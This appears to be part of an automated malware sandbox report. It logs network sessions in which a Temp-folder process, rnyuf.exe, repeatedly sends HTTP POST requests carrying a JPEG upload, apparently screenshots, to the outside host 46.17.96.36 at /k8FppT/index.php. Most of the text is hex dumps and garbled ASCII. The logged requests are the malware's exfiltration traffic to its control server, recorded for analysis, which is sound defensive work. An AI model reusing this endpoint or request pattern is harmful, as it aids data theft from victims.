                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:31.269723892 CEST6202OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:31.269747972 CEST6210OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:31.269874096 CEST6216OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:27:31.269901037 CEST6219OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:31.269995928 CEST6222OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:27:31.305613995 CEST6225OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:31.417326927 CEST6295INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:31 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        47192.168.2.44978546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:31.650069952 CEST6296OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----0906b0bfa15b848264cc97903c8df716
                                        Host: 46.17.96.36
                                        Content-Length: 110651
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:31.650162935 CEST6296OUTData Raw: 2d 2d 2d 2d 2d 2d 30 39 30 36 62 30 62 66 61 31 35 62 38 34 38 32 36 34 63 63 39 37 39 30 33 63 38 64 66 37 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------0906b0bfa15b848264cc97903c8df716Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:31.650361061 CEST6306OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:31.650473118 CEST6308OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:31.682387114 CEST6312OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:31.682432890 CEST6314OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:31.682442904 CEST6317OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:31.682641029 CEST6329OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:31.682682991 CEST6334OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:31.714725018 CEST6337OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:31.714761019 CEST6340OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:31.819341898 CEST6407INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:31 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        48192.168.2.44978646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:32.041176081 CEST6408OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----0906b0bfa15b848264cc97903c8df716
                                        Host: 46.17.96.36
                                        Content-Length: 110651
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:32.041301966 CEST6408OUTData Raw: 2d 2d 2d 2d 2d 2d 30 39 30 36 62 30 62 66 61 31 35 62 38 34 38 32 36 34 63 63 39 37 39 30 33 63 38 64 66 37 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------0906b0bfa15b848264cc97903c8df716Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:32.041528940 CEST6418OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:32.041686058 CEST6421OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:32.074615002 CEST6424OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:32.074681997 CEST6429OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:32.074702978 CEST6443OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:32.074850082 CEST6446OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:27:32.107547045 CEST6452OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:32.107620955 CEST6465OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:27:32.107846975 CEST6470OUTData Raw: 50 67 ce f8 cd 30 83 9e 6b e8 e5 f0 d6 88 07 fc 82 ed 7f ef 8a f3 3f 89 9a 7d 9d 95 cd 97 d9 2d a2 83 72 36 e1 18 c6 79 aa 85 5e 77 60 92 e5 3c 8e 93 14 99 a5 15 c6 7a 07 a6 fc 0d e3 c6 b7 bf f6 0e 7f fd 19 1d 7b ad f3 e2 df 1f de 60 3f af f4 af
                                        Data Ascii: Pg0k?}-r6y^w`<z{`?t}fA4;;;]> x!GVP)F{0T]Il;j|~)k%o1)qIJ+,)i3@4uR)<:s^Q_YH;x~^S
                                        Aug 29, 2021 22:27:32.212160110 CEST6519INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:32 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        49192.168.2.44978746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:32.446971893 CEST6520OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----0906b0bfa15b848264cc97903c8df716
                                        Host: 46.17.96.36
                                        Content-Length: 110651
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:32.447123051 CEST6520OUTData Raw: 2d 2d 2d 2d 2d 2d 30 39 30 36 62 30 62 66 61 31 35 62 38 34 38 32 36 34 63 63 39 37 39 30 33 63 38 64 66 37 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------0906b0bfa15b848264cc97903c8df716Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:32.447329044 CEST6530OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:32.447386980 CEST6533OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:32.479619026 CEST6536OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:32.479657888 CEST6538OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:32.479669094 CEST6541OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:32.479856968 CEST6553OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:32.479923964 CEST6556OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:32.480144024 CEST6558OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:27:32.512106895 CEST6561OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:32.618901014 CEST6632INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:32 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        5192.168.2.44974046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:10.261569023 CEST1556OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----c40968ed499c6f5938534922f4d89073
                                        Host: 46.17.96.36
                                        Content-Length: 107710
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:10.261873960 CEST1556OUTData Raw: 2d 2d 2d 2d 2d 2d 63 34 30 39 36 38 65 64 34 39 39 63 36 66 35 39 33 38 35 33 34 39 32 32 66 34 64 38 39 30 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------c40968ed499c6f5938534922f4d89073Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:10.262332916 CEST1566OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:10.262840986 CEST1569OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
